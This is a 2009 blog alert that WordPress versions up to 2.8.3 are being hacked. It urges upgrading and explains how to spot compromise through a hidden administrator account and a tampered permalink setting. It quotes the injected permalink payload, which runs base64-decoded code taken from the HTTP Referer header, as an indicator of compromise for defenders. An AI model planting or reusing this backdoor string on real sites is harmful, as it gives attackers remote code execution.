ALERT: Old WordPress Blogs Under Attack

All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.

The latest WordPress version 2.8.4 seems to be SAFE.

The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.

Thank you so much for Lorelle on WP for making a post about this, so I got the news (check Lorelle's post for all the info).

wordpress news ALERT: Old WordPress Blogs Under AttackUpdate to the Latest WordPress Version

Here's what you need to do if you have blog(s) that are not updated to the latest WordPress version:

  • Before you continue reading,
  • Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
  • Really, stop reading, it IS that serious.
  • Continue reading after you have UPGRADED your WordPress to the latest version.

Recognizing The Attack

Two clues have been recognized to spot if you've already been hacked (here's hoping you haven't been):

  • new administrator
    • the second clue is that a “back door” was created by a “hidden” Administrator.
    • Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
  • permalinks (Settings --> Permalinks):
    • The keywords are “eval” and “base64_decode.”

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

Secure Your Blog

The News Updates

2009-09-04: News reported on the WordPress.org Support Forums:  HACK WARNING: UPGRADE IMMEDIATELY:

if you don't upgrade, you will get hacked. It's not a matter of "if", it's a matter of "when". Don't wait to be hacked.

2009-09-05: WordPress development blog: How to Keep WordPress Secure

Spread the News!

We need to make sure everyone is informed about this. But stick to the facts, which at the moment is that:

  • Old WordPress blogs up to 2.8.3 are reportedly being attacked
  • WP version 2.8.4 seems to be safe

Re-Tweet to make sure EVERY WordPress blogger is aware of this.

And always, always keep your WordPress and plugins in your blog updated to the latest version!

Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP

Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY

Posted by

Topic: WordPress
Tags: , , , ,

If you enjoyed this post, sign up for updates (it's free)


Feedback, questions and comments are also welcome on my Facebook page